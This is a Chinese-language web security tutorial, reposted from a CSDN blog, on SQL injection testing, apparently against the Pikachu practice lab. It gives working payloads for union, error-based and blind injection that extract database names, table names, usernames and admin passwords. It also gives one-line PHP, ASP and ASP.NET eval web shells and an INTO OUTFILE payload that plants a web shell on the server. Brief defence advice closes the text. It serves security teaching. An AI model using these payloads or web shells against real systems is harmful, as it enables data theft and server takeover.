网安教育
培养网络安全人才
技术交流、学习咨询
SQL注入就是 有些恶意用户在提交查询请求的过程中 将SQL语句插入到请求内容中,同时程序的本身对用户输入的内容过于相信,没有对用户插入的SQL语句进行任何的过滤,从而直接被SQL语句直接被服务端执行,导致数据库的原有信息泄露,篡改,甚至被删除等风险。
SQL注入测试的思想:
常见的SQL注入点类型:
常见的测试语句:
SQL 注入漏洞测试:
数字型注入(POST传参):
字符型注入(GET传参):
搜索型注入:
XX型注入:
基于 union 联合查询的信息获取:
基于 函数 报错的信息获取:
基于 insert / update 注入(账号 || 密码):
delete 注入(留言板):
Http Header注入(http 头):
基于 boolean 盲注(真 / 假):
基于 Time 盲注(时间):
利用SQL注入进行远程控制服务器:
宽字节注入:
SQL注入的防御:
免责声明:
严禁利用本文章中所提到的工具和技术进行非法攻击,否则后果自负,上传者不承担任何责任。
SQL注入测试的思想:
主要是怎样可以闭合,数据库前面的语句。然后再去欺骗后台执行我们需要的查询语句.
常见的SQL注入点类型:
1数字型:user_id=$id
2
3字符型:user_id='$id'
4
5搜索型:text LIKE '%{$_GET['SEARCH']}%'"
6
常见的测试语句:
1' and 1=1 # //单引号是闭合前面的数据(写闭合数据),因为 1=1 是真则返回是正常页面.
2' and 1=2 # //单引号是闭合前面的数据(写闭合数据),因为 1=2 是假则返回是错误页面.
3" and 1=1 # //单引号是闭合前面的数据(写闭合数据),因为 1=1 是真则返回是正常页面.
4" and 1=2 # //单引号是闭合前面的数据(写闭合数据),因为 1=2 是假则返回是错误页面.
5' or 1=1 # //返回所以信息.
6" or 1=1 # //返回所以信息.
7' //查看有没有报错.
8" //查看有没有报错.
9以上测试说明:可能存在注入点.
10
SQL 注入漏洞测试:
数字型注入(POST传参):
1$id=$_POST['id'] //模拟后台传入的参数思想
2select 字段1,字段2 from 表名 where id =$id
3(注意:有时候是 ” 双引号,则单引号换为双引号)
第一步:进入可能存在SQL注入的页面,点击输入 1 或 2....看看有没有返回页面信息等.
第二步:打开 Burp Suite 工具进行抓包,然后发送给 " 重发器 "
第三步:在传参的后面填写 or 1=1,发送查看有没有返回这个表的所以信息.
字符型注入(GET传参):
1$uname=$_GET['username'] //模拟后台传入的参数思想
2select 字段1,字段2 from 表名 where username='$uname';
第一步:进入可能存在SQL注入的页面,输入一个正常返回页面的参数和一个错误返回页面的参数.(比如:正常返回页面的参数:kobe , 错误返回页面的参数:1)
第二步:在页面后面填写一个字符然后跟Mysql语句 (先把前面的语句闭合),(再使用 # 注释掉后面的): aaa' or 1=1#'
1语句解析:
2(1)前面的 ' 单引号是闭合 Mysql数据库 的单引号.
3(2)在拼写 Mysql数据库 语句时后面也要有一个 ' 单引号.
4(3)想方法把后面的 ' 单引号给注释掉,在 Mysql数据库 中是使用 # 或 -- 注释.
5(注释 # 或 --后面的语句.)
6(注意:有时候是 ” 双引号,则单引号换为双引号)
1$uname=$_GET['username'] //模拟数据库后面的运行是这样的
2select 字段1,字段2 from 表名 where username='kobe' or 1=1#';
搜索型注入:
1select * from 表名 where 字符(username) like '%k%';
2语句解析:
3(1)like 是对表进行匹配性查询,匹配 % 中间含有的值,在 字符(username) 中所以含有 % 中间的值(k)都会返回出来.
第一步:进入可能存在SQL注入的页面,输入这个正常的查询.
第二步:查询框中输入(先把前面的语句闭合),(再使用 # 注释掉后面的):xxx%' or 1=1 #
1select * from 表名 where 字段(username) like '%xxx%' or 1=1 #%';
2//模拟数据库后面的运行是这样的
1select * from 表名 where 字段(username) like '%xxx%' or 1=1 #%';
2语句解析:
3(1)' 单引号前的数据是闭合 Mysql数据库 中的语句.( xxx%' )
4(2)or 1=1 是查找这个表中所以的数据.
5(3)# 或 -- 是 Mysql数据库 注释掉后面的语句.
6(注意:有时候是 ” 双引号,则单引号换为双引号)
XX型注入:
1$uname=$_GET['username'] //模拟后台传入的参数思想
2select 字段1,字段2 from 表名 where username=('$uname');
1select 字段1,字段2 from 表名 where username=('xx') or 1=1 #');
2语句解析:
3(1)' 单引号前的数据是闭合 Mysql数据库 中的语句.( xx') )
4(2)or 1=1 是查找这个表中所以的数据.
5(3)# 或 -- 是 Mysql数据库 注释掉后面的语句.
6(注意:有时候是 ” 双引号,则单引号换为双引号)
第一步:进入可能存在SQL注入的页面,先把前面的语句闭合,输入:xx') or 1=1 #
基于 union 联合查询的信息获取:
1union 联合查询:可以通过联合查询来查询指定的数据.
2用法举例:
3select username,password from user where id=1 union select 字段1,字段2 from 表名
4(联合查询的字段 数 需要和主查询一致!)
1思路:对查询的结果使用 order by 按照指定的列进行排序,如果指定的列不存在,数据库会报错。
2通过报错判断查询结果的列数,从而确定主查询的字段数。
3
4order by x //对查询的结果进行排序,按照第X列进行排序,默认数字0-9,字母a-z
1Select version(); //取的数据库版本
2Select database(); //取得当前的数据库
3Select user(); //取得当前登录的用户
第一步:进入可能存在SQL注入的页面,先把前面的语句闭合,再使用 order by 测试字段数有多少.(如果指定的列不存在,数据库会报错,通过报错判断查询结果的列数,从而确定主查询的字段数.)(再使用 # 注释掉后面的)
1aa' order by 3 # //报错的
2aa' order by 2 # //没有报错的
第二步:已经字段有几段,则把前面的语句闭合,再使用 union select 字段1,字段2... from 表名
1aa' union select database(),user() #
2database() //取得当前的数据库
3user() //取得当前登录的用户
基于 函数 报错的信息获取:
1技巧思路:
2在 MYSQL 中使用一些指定的函数来制造报错,从而从报错信息中获取设定的息.
3select/insert/update/delete都可以使用报错来获取信息.
1背景条件:
2后台没有屏蔽数据库报错信息,在语法发生错误时会输出在前端.
.
1基于报错的信息获取---三个常用的用来报错的函数:
2updatexml() //函数是MYSQL对 XML文档 数据进行 查询和修改 的XPATH函数.
3extractvalue() //函数也是MYSQL对 XML文档 数据进行 查询 的XPATH函数。
4floor() // MYSQL 中用来 取整 的函数.
1Updatexml()函数作用:改变(查找并替换)XML文档中符合条件的节点的值.
2语法:UPDATEXML (xml_document, XPathstring, new_value)
3第一个参数:xml_document,表中的字段名
4第二个参数:XPathstring (Xpath格式的字符串),定位哪个位置
5第三个参数:new_value,String格式,替换查找到的符合条件的
6限制:Xpath定位必须是有效的,否则则会发生错误.
第一步:进入可能存在SQL注入的页面,随便输入一个数据,查看有没有报错的信息返回.(有报错才符合我们的条件.)
第二步:使用基于报错: updatexml()函数(主要是替换第二个参数,把他替换为我们要查询数据使用的函数.)
1kobe' and updatexml(1,version(),0) #
1对传入的数据进行处理:
2kobe' and updatexml(1,concat(0x7e,version()),0) # //取的数据库版本
3kobe' and updatexml(1,concat(0x7e,database()),0) # //取得当前的数据库
4kobe' and updatexml(1,concat(0x7e,user()),0) # //取得当前登录的用户
50x7e 是 ~
6concat()函数:传入的两个参数组合起来,然后再打印出来.
7
1使用limit一次一次进行获取表名:
2kobe' and updatexml(1,concat(0x7e,(select table_name from information_schema.tables where table_schema='pikachu' limit 0,1)),0) #
3// table_schema='数据库名'
4// limit 0,1 只改 0 的那个数字( 0 代表第一个数据库名的名称, 1 代表第二个数据库名的名称,....)
1获取到表名后,再获取列名:
2kobe' and updatexml(1,concat(0x7e,(select column_name from information_schema.columns where table_name='users' limit 0,1)),0) #
3// table_name='表名'
4// limit 0,1 只改 0 的那个数字( 0 代表第一个表名的名称, 1 代表第二个表名的名称,....)
1获取到列名后,再获取数据:
2kobe' and updatexml(1,concat(0x7e,(select username from users limit 0,1)),0) #
3//可以获取 用户名.
4kobe' and updatexml(1,concat(0x7e,(select password from users where username='admin' limit 0,1)),0) #
5//可以获取 用户的密码.
6
基于 insert / update 注入(账号 || 密码):
模拟后台代码执行:(正常执行)
1模拟后台代码执行:(正常执行)
2insert into member(username,pw,sex,phonenum,email,address) values('xxx',11111,2,3,4,5)
3
4模拟后台代码执行:(注入时的执行)
5insert into member(username,pw,sex,phonenum,email,address) values('xxx' or updatexml(1,concat(0x7e,version()),0) or'',11111,2,3,4,5)
6
7insert into member(username,pw,sex,phonenum,email,address) values('xxx' or updatexml(1,concat(0x7e,user()),0) or'',11111,2,3,4,5)
8
9insert into member(username,pw,sex,phonenum,email,address) values('xxx' or updatexml(1,concat(0x7e,database()),0) or'',11111,2,3,4,5)
第一步:进入可能存在SQL注入的页面,随便输入一个数据,查看有没有报错.
第二步:输入命令进行测试.
1xxx' or updatexml(1,concat(0x7e,version()),0) or' //取的数据库版本
2
3xxx' or updatexml(1,concat(0x7e,user()),0) or' //取得当前登录的用户
4
5xxx' or updatexml(1,concat(0x7e,database()),0) or' //取得当前的数据库
delete 注入(留言板):
1后台执行的代码:
2delete from message where id={$_GET['id']}
第一步:进入可能存在SQL注入的页面,随便输入一个数据.
第二步:打开 Burp Suite 对刚刚的数据进行拦截抓包,然后发送到“重发器”,找到我们输入的数据进行修改为.
11 or updatexml(1,concat(0x7e,database()),0) //取的数据库版本
2
31 or updatexml(1,concat(0x7e,user()),0) //取得当前登录的用户
4
51 or updatexml(1,concat(0x7e,database()),0) //取得当前的数据库
第三步:对我们插入的数据进行转换为 URL 编码.(编码:鼠标右键点击--->转换选择-->URL-->特殊字符的URL编码)
Http Header注入(http 头):
1原理及概括:
2有些时候,后台开发人员为了验证客户端头信息(比如常用的cookie验证)
3或者通过http header头信息获取客户端的一些信息,比如useragent、accept字段等等。
4
5会对客户端的http header信息进行获取并使用SQL进行处理,如果此时没有足够的安全考虑则可能会导致基于http header的SQL Inject漏洞。
第一步:进入可能存在SQL注入的页面,进行登录.
第二步:打开 Burp Suite 对刚刚浏览的数据进行发送到“重发器”中查看.(使用 User-Agent: 做测试,把他后面的删除,输入一个:' (单引号)查看有没有返回报错)
第三步:输入我们构造的语句.(自己需要的信息.)
1xxx' or updatexml(1,concat(0x7e,version()),0) or' //取的数据库版本
2
3xxx' or updatexml(1,concat(0x7e,user()),0) or' //取得当前登录的用户
4
5xxx' or updatexml(1,concat(0x7e,database()),0) or' //取得当前的数据库
第四步:打开 Burp Suite 对刚刚浏览的数据进行发送到“重发器”中查看.(使用 Cookie: 做测试,在用户名后面添加一个:' (单引号)查看有没有返回报错.)
第五步:输入我们构造的语句.(自己需要的信息.)
1admin' and updatexml(1,concat(0x7e,version()),0) # //取的数据库版本
2admin' and updatexml(1,concat(0x7e,user()),0) # //取得当前登录的用户
3
4admin' and updatexml(1,concat(0x7e,database()),0) # //取得当前的数据库
5
基于 boolean 盲注(真 / 假):
1什么是盲注以及常见的盲注类型:
2在有些情况下,后台使用了错误消息屏蔽方法(比如@)屏蔽了报错
3此时无法在根据报错信息来进行注入的判断,这种情况下的注入,称为“盲注”
4
5根据表现形式的不同,盲注又分为based boolean和based time两种类型
6
7基于boolean的盲注主要表现症状:
8(1)没有报错信息
9(2)不管是正确的输入,还是错误的输入,都只显示两种情况(我们可以认为是0或者1)
10(3)在正确的输入下,输入and 1=1 / and 1=2发现可以判断.
第一步:进入可能存在SQL注入的页面,输入我们构造的语句.(有没有返回正常和错误.)如果正常和错误都有,则存在注入.
1kobe' and 1=1 # //正常返回页面(真)
2kobe' and 1=2 # //错误返回页面(假)
第二步:我们已经知道,这里存在注入点了.(所以进行测试有没有报一些我们想要的数据.)(如果手动注入取信息是比较麻烦的,建议使用工具)
1kobe' and ascii(substr(database(),1,1))>113 #
2ascii 是转换为 ASCLL 编码
3substr 是取字符,中间的 1 是取第一个字符.
4database() 是取数据库名称
5>113 是转换为 ASCLL 编码大于113,则正常返回页面,如果小于 113 ,则错误返回页面.
基于 Time 盲注(时间):
1如果说基于boolean的盲注在页面上还可以看到0 or 1的回显的话
2那么基于time的盲注完全就啥都看不到了!
3
4但还有一个条件,就是“时间”,通过特定的输入,判断后台执行的时间,从而确认注入!
5
6常用的Teat Payload:
7kobe' and sleep(5)#
8看看输入:kobe 和输入kobe ' and sleep(5)#的区别,从而判断这里存在based time的SQL注入漏洞
第一步:进入可能存在SQL注入的页面,输入我们构造的语句.(按F12 --> 查看网络.)
1kobe' and sleep(10) #
2sleep 是暂停时间. 10 是秒
3
第二步:我们已经知道,这里存在注入点了.(所以进行测试有没有报一些我们想要的数据.)(按F12 --> 查看网络.)
1kobe' and if(substr(database(),1,1)='p',sleep(10),null) #
2substr 是取字符,中间的 1 是取第一个字符.
3database() 是取数据库名称
4if 判断数据库名称第一个字符是不是 p ,如果是时间延长十秒,如果不是不延长
利用SQL注入进行远程控制服务器:
一句话木马是一种短小而精悍的木马客户端,隐蔽性好,且功能强大.
1一句话木马是一种短小而精悍的木马客户端,隐蔽性好,且功能强大.
2PHP: <?php @eval($_POST['bgxg']);?>
3ASP: <%eval request("bgxg")%>
4ASP.NET: <%@ Page Language="Jscript"%><%eval(Request.ltem["bgxg"],"unsafe");%>
5
1通过SQL漏洞·写入恶意代码:
2into outfile 将select的结果写入到指定目录的1.txt中
3在一些没有回显的注入中可以使用into outfile将结果写入到指定文件,然后访问获取
4
5前提条件:
61.需要知道远程目录
72.需要远程目录有写权限
83.需要数据库开启了secure_file_priv
第一步:进入可能存在SQL注入的页面,输入我们构造的语句.
1kobe' union select "<?php @eval($_GET['bgxg'])?>,2 into outfile "写入到服务器的目录/1.php" #
2//outfile 是将前面的字段(一句话木马)结果输入到后面的目录中.
第二步:浏览一下这个木马 ?bgxg=phpinfo(); 如果可以返回则成功写,再使用工具进行连接.
宽字节注入:
1宽字节注入原理:
2宽字节注入使用了转义的函数,对输入'进行了转义'
3但是可以利用反斜杠编码为%5c,然后再用%df构成(連)字绕过对 ' 的转义.
4(设置编码时设置为了gbk编码)
第一步:进入可能存在SQL注入的页面,输入我们构造的语句.
1kobe%df’ or 1=1#
第二步:打开 Burp Suite 对刚刚浏览的数据进行发送到“ 重发器 ”中查看.(重新输入刚刚的数据.)
SQL注入的防御:
(1)应尽可能用服务器的数据库权限降至最低.
(2)尽可能对进入数据库的特殊字符进行转义处理,或编码转换.
(3)尽可能在检测的时候使用专门的 SQL 注入检测工具进行检测.
(4)尽可能避免网站打印出 SQL 错误信息,比如类型错误、字段不匹配等等.
(5)尽可能在查询语句时,不要直接将用户输入变量直接拼接 SQL 语句中.(可以使用数据库提供的参数化查询接口)
版权声明:本文为CSDN博主「半个西瓜.」的原创文章,遵循CC 4.0 BY-SA版权协议,转载请附上原文出处链接及本声明。
原文链接:https://blog.csdn.net/weixin_54977781/article/details/130234174
版权声明:著作权归作者所有。如有侵权请联系删除
网络安全基础班、实战班线上全面开启,学网络安全技术、升职加薪……有兴趣的可以加入网安大家庭,一起学习、一起成长,考证书求职加分、升级加薪,有兴趣的可以咨询客服小姐姐哦!
加QQ(1005989737)找小姐姐私聊哦
原文始发于微信公众号(开源聚合网络空间安全研究院):【Web安全篇】SQL注入漏洞测试全解
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论